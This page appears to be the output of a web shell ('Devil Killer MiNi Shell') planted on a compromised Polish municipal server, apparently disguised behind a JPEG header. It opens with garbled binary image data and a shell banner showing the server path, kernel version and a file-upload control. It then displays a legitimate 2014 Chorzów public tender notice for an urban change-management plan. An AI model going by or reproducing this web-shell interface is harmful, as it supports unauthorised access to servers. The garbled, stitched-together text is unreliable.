JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140617/205168-N-2014.html

<p class="kh_header"><b>Chorzów: Opracowania:Zintegrowanego  Planu Zarządzania Zmianami Obszaru Funkcjonalnego Chorzowa , Rudy  Śląskiej i  Świętochłowic do 2030 r.</b><br>
<b>Numer ogłoszenia: 205168 - 2014; data zamieszczenia: 17.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Chorzów, Biuro Zamówień Publicznych , Rynek 1, 41-500 Chorzów, woj. śląskie, tel. 32 4165000, faks 32 4165639, 32 4165640.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowania:Zintegrowanego  Planu Zarządzania Zmianami Obszaru Funkcjonalnego Chorzowa , Rudy  Śląskiej i  Świętochłowic do 2030 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie Zintegrowanego  Planu Zarządzania Zmianami(ZPZZ)  Obszaru Funkcjonalnego Chorzowa, Rudy  Śląskiej i  Świętochłowic - RZP.271.407.2014.
Współczesne miasta , aby mogły się rozwijać  w sposób zrównoważony, muszą być atrakcyjne  dla mieszkańców , lokalnych przedsiębiorców oraz potencjalnych inwestorów .
Dlatego koniecznym jest opracowanie kierunków pozytywnych zmian w wymiarze  przestrzennym, gospodarczym, społecznym, infrastrukturalnym i przyrodniczym. Celem takich działań powinno być przede wszystkim przeciwdziałanie odpływowi mieszkańców, w szczególności tych posiadających najwyższe kompetencje i kwalifikacje, przy jednoczesnym  umiejętnym pozyskiwaniu  kapitału  inwestycyjnego  opartego na wiedzy, który  przyciągnie atrakcyjność danego  miasta. Wiadomym jest, że wszystkie trzy miasta uczestniczące w projekcie utraciły większość dotychczasowych funkcji społeczno-gospodarczych , przestrzennych i środowiskowych  powiązanych  z degradacją fizyczną  zabudowy. Ta utrata dotychczasowych funkcji  społeczno- gospodarczych  miast  lub ich dzielnic lub kwartałów  prowadzi do pogłębiania  występujących  problemów : spadku poziomu przedsiębiorczości ,wzrostu bezrobocia, pogorszenia  jakości infrastruktury, a także intensyfikacji    problemów społecznych  związanych z depopulacją  oraz występującą koncentracją  patologii ubóstwa. Zaistniała sytuacja  przekłada się na pogorszenie  jakości życia mieszkańców i  prowadzi  do zmniejszenia atrakcyjności  miasta dla  jego mieszkańców, a tym samym skutkuje  pogorszeniem się wizerunku miasta .Ta sytuacja powoduje, że samorządy muszą zmodyfikować swój dotychczasowy sposób zarządzania miastem i dostosować go do zachodzących  zmian. Właśnie organizacja systemu zarządzania miejscami priorytetowymi tzw. lokalnymi centrami  rzutującymi na charakter miasta   potęgująca  integracje i aktywność mieszkańców  jest podstawą niniejszego przedmiotu zamówienia. 
W każdym z trzech miast należy wskazać po jednym centrum lokalnym wyznaczyć jego granice na załączniku mapowym  i opracować program zarządzania zmianami w tych centrach. Typując centra lokalne w tych trzech miastach należy je odnieść do całego obszaru funkcjonalnego uwzględniając ich wzajemne powiązania i funkcje uzupełniające.  
Przygotowując ZPZZ należy przyjąć, że w każdym mieście zostanie powołany zespół do obsługi danego centrum lokalnego, w skład którego wchodzić będzie menadżer. Sugerujemy, aby zespół był co najmniej dwuosobowy. ZPZZ powinien mieć w swojej strukturze część identyfikacyjną i diagnozę  centrum lokalnego ,cześć wdrożeniową zmian  i cześć charakteryzująca bieżącą obsługę centrum lokalnego.   Przygotowując ZPZZ  należy korzystać z doświadczeń krajowych i europejskich  w dziedzinie zarządzania centrum miasta - Town Centre Management (TCM).Pozwoli to  na zaadoptowanie  już funkcjonujących  rozwiązań  do potrzeb niniejszego projektu  oraz będzie bazą  pomysłów ,które  mogą stać się podstawą  i inspiracją  do autorskich działań i rozwiązań. Zamawiający uważa ,że  program powinien uwzględniać m.in.:
1.	Stały monitoring i ewaluację podejmowanych  zadań związanych z zarządzaniem centrami lokalnymi
2.	Inicjowanie  wspólnych akcji  i przedsięwzięć  w obrębie centrów lokalnych ,
3.	Organizację i współorganizację imprez,
4.	Współpracę  z mieszkańcami, przedsiębiorcami, handlowcami  oraz właścicielami nieruchomości ,
 
5.	Prowadzenie kampanii informacyjnych  i społecznych  dotyczących centrów lokalnych,
6.	Zalecenia w zakresie polityki promocyjnej dotyczącej działań w tych centrach lokalnych.
Zintegrowany Program Zarządzania Zmianami Obszaru Funkcjonalnego powinien być wykonany do 2030 roku, jednakże prognoza szczegółowa działań winna być do 2020r.,a długookresowa do 2030 r. nie wymaga szczegółowego opisu zadań strategicznych. Raczej powinna skupiać na  kierunkach działań. Zamawiający zakłada ,że opracowany program będzie mógł  stanowić podstawę do aplikowania  o środki zewnętrzne zarówno indywidualnie przez każde z miast biorące udział w projekcie, jak również wspólnie przez wszystkie lub wybrane  miasta .
Realizacja ZPZZ winna być opracowana metodą środowiskową i dlatego Wykonawca powinien zapewnić 3  spotkania  konsultacyjne ( po jednym w każdym mieście uczestniczącym w projekcie )  z udziałem moderatora trwające do 5  godzin , salę zapewnia Wykonawca , na każde   spotkanie Wykonawca zapewnia catering dla około 60   osób (w formie napojów woda mineralna, soki, kawa , herbata wraz z dodatkami oraz posiłek lunchowy, dla którego dopuszcza się kanapki z częściowym przystosowaniem  ich   dla wegetarian przy założeniu około 3 kanapek dla jednej osoby). Wykonawca zapewnia materiały dla potrzeb konsultacji i materiały piśmienne ,jak  również informacje  o projekcie wraz z wykonaniem plakatów i ich rozplakatowaniem  .Plakaty będą zawierały informacje o projekcie. Wykonawca zobowiązany jest  do poinformowania i zapewnienia udziału w warsztatach osób zainteresowanych  ze szczególnym uwzględnieniem  podmiotów działających w wyznaczonym obszarze danego centrum lokalnego . Konsultacje winny się odbyć do III  kwartału  2014 r. w każdym z miast. Rezultaty konsultacji winny być wykorzystane w następujący sposób:
1.	Wykonawca utrwala wyniki konsultacji - po konsultacjach musi  powstać  protokół lub notatka , jak również materiał fotograficzny. Dokumenty te zostaną udostępnione na stronie internetowej projektu.
2.	Zamawiający upubliczni  wyniki konsultacji oraz przedstawi  wyniki analizy materiału powstałego w czasie konsultacji, które sporządzi Wykonawca. 
Zamawiający  zapewni zamieszczenie na stronie internetowej projektu niezbędnych materiałów dla potrzeb realizacji opracowania.

Opracowanie ZPZZ winno  być przygotowane w formie opracowania w formacie A-4 i zawierać powyżej 60  stron ( w tym materiał zdjęciowy kolorowy, schematy, tabele, ankiety, plany ,mapy itp.) , a jego wersja robocza i skład graficzny przygotowany do druku zostanie zaakceptowany przez Zamawiającego. Zamawiający zakłada wydrukowanie 40  egzemplarzy. Każdy egzemplarz wyposażony będzie dodatkowo w nośnik elektroniczny zawierający pełną treść dokumentu .

 
Zamawiający otrzyma od Wykonawcy  4 egzemplarze   ZPZZ na 4 sztukach nośników elektronicznych w formie edytowalnej i nieedytowalnej przy użyciu powszechnie dostępnego programu. Dodatkowo Wykonawca wykona 4 egzemplarze  prezentacji  multimedialnych  o 
minimalnej ilości  15  sztuk slajdów na 4 sztukach nośników  elektronicznych w formacie edytowalnym  i nieedytowalnym w dostępnym powszechnie  oprogramowaniu np. w programie  Power Point. 
Zamawiający udostępni Wykonawcy logotypy, które muszą być zamieszczone w ZPZZ na nośniku elektronicznym.
Zarówno pełny dokument  ZPZZ oraz prezentacja multimedialna  mogą zostać udostępnione na stronie internetowej miast  Chorzowa ,Rudy Śląskiej i Świętochłowic oraz na stronie internetowej projektu  www.miasto3com 
W trakcie prac nad  projektem Wykonawca będzie przedstawiał i uzgadniał z Zamawiającym wersje robocze dokumentu  stanowiące przedmiot zamówienia, jak również treść opracowanej 
przez Wykonawcę ankiety  wykonanej  w taki sposób ,aby można je było zamieścić na stronie (ach) internetowych.
Przy opracowaniu przedmiotu zamówienia Wykonawca odpowiada za merytoryczną stronę opracowania, błędy literowe, układ i zawartość. W przypadku stwierdzenia jakichkolwiek błędów w opracowaniu Wykonawca uwzględni uwagi Zamawiającego. 

Prawa autorskie: Wykonawca przeniesie nieodpłatnie na Zamawiającego wyłączne prawa autorskie do opracowania.

Uwaga:
Do oferty Wykonawca winien dołączyć opis - konspekt przedstawiający sposób realizacji przedmiotu zamówienia wraz z harmonogramem terminowo-rzeczowym przy założeniu, że rozpoczęcie realizacji zamówienia nastąpi niezwłocznie od rozstrzygnięcia postępowania, a zakończenie do 15.10.2014r.   Konspekt powinien odpowiadać strukturze przedmiotu zamówienia i zawierać max 10 stron..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.30.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia. Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w/w warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w/w warunku, jeżeli Wykonawca wykaże się wykonaniem przynajmniej jednej  usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Poprzez usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia Zamawiający rozumie wykonanie w sposób należyty usługi w postaci :
Przygotowania, co najmniej jednego dokumentu  strategicznego  lub innego dokumentu programowego dla co najmniej jednego dużego obszaru zurbanizowanego (miasta powyżej 50 000 mieszkańców, województwa, kraju). Powyższe opracowania  mogą być wykonane w ramach jednego  zadania lub odrębnych zadań. 

Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów ( załączniki nr 4 i 5).
Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z  postępowania zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp. Wykonawcy wspólnie ubiegający się  o udzielenie zamówienia w/w warunek spełniają łącznie. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
2.2.2.	W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą :
a)	wykaz  wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług,  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - zgodnie z załącznikiem nr 5 do SIWZ; . Pod pojęciem głównych usług zamawiający rozumie usługę w przedmiocie jw., w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia.
b) oświadczenie (załącznik nr 4 do SIWZ).
      Dowodami, o których mowa w punkcie a) są:
1)	poświadczenie w przypadku podmiotów innych niż zamawiający, o których mowa w art. 3 ust. 1 ustawy Pzp, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, 
2)	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt. 1).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia. Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w/w warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia. Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w/w warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia. Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w/w warunek spełniają łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy.
Uwaga: w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (podpisana przez każdego z wykonawców lub pełnomocnika). 
2. Opis - konspekt przedstawiający sposób realizacji przedmiotu zamówienia wraz z harmonogramem terminowo-rzeczowym przy założeniu, że rozpoczęcie realizacji zamówienia nastąpi niezwłocznie od rozstrzygnięcia postępowania, a zakończenie do 15.10.2014r.   Konspekt powinien odpowiadać strukturze przedmiotu zamówienia i zawierać max 10 stron.
3. Oświadczenie o spełnianiu warunków udziału w postępowaniu   w trybie art. 22 ust. 1 ustawy Pzp - załącznik nr 1 SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie).
4. Stosowne pełnomocnictwo w sytuacjach, w których uprawnienie do podpisania oferty nie wynika z zamieszczonego dokumentu. Pełnomocnictwo do reprezentowania danego podmiotu w postępowaniu o udzielenie zamówienia publicznego powinno zostać złożone w oryginale lub kopii poświadczonej notarialnie.
5. Pełnomocnictwo podmiotów występujących wspólnie  wskazujące, że osoba występująca w imieniu tych podmiotów jest upoważniona do ich reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo  powinno zostać złożone w oryginale lub kopii poświadczonej notarialnie.
6.Wykaz informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów art. 4 ust. 4 ustawy z dnia 16 kwietnia 1993 roku o zwalczaniu nieuczciwej konkurencji, które wykonawca pragnie zastrzec przed dostępem dla innych uczestników postępowania z podaniem podstawy prawnej.
7. Oświadczenie Wykonawcy dotyczące części zamówienia, których wykonanie zamierza powierzyć podwykonawcom lub podanie przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp ( jeżeli dotyczy).  W przypadku braku informacji zamawiający uzna, że wykonawca zamierza wykonać zamówienie samodzielnie.
8. Jeżeli Wykonawca wykazuje spełnianie warunku, dotyczącego posiadania wiedzy 
i doświadczenia na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacjach części zamówienia, Wykonawca składa w odniesieniu do tych podmiotów dokumenty, o których mowa w sekcji  IV pkt 1.1. i 1.2. SIWZ.
9. W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale  technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest w takiej sytuacji udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - jakość zawartości merytorycznej konspektu przedstawiającego sposób realizacji przedmiotu zamówienia - 50</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Niedopuszczalna jest pod rygorem nieważności zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy za wyjątkiem przypadków wymienionych poniżej:
1. W zakresie wynagrodzenia:
a)	w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT,
b)	w przypadku zmniejszenia zakresu usług.
2. W zakresie przedmiotu zamówienia:
a) wprowadzenia usług zamiennych ( do poziomu  20  % wartości zamówienia ) wynikających z sytuacji awaryjnej,
b)w przypadku zmniejszenia zakresu usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chorzow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Chorzów, Biuro Zamówień Publicznych, Rynek 1, 41-500 Chorzów, pokój 237/II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2014 godzina 09:45, miejsce: Urząd Miasta Chorzów, Biuro Zamówień Publicznych, Rynek 1, 41-500 Chorzów, pokój 237/II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




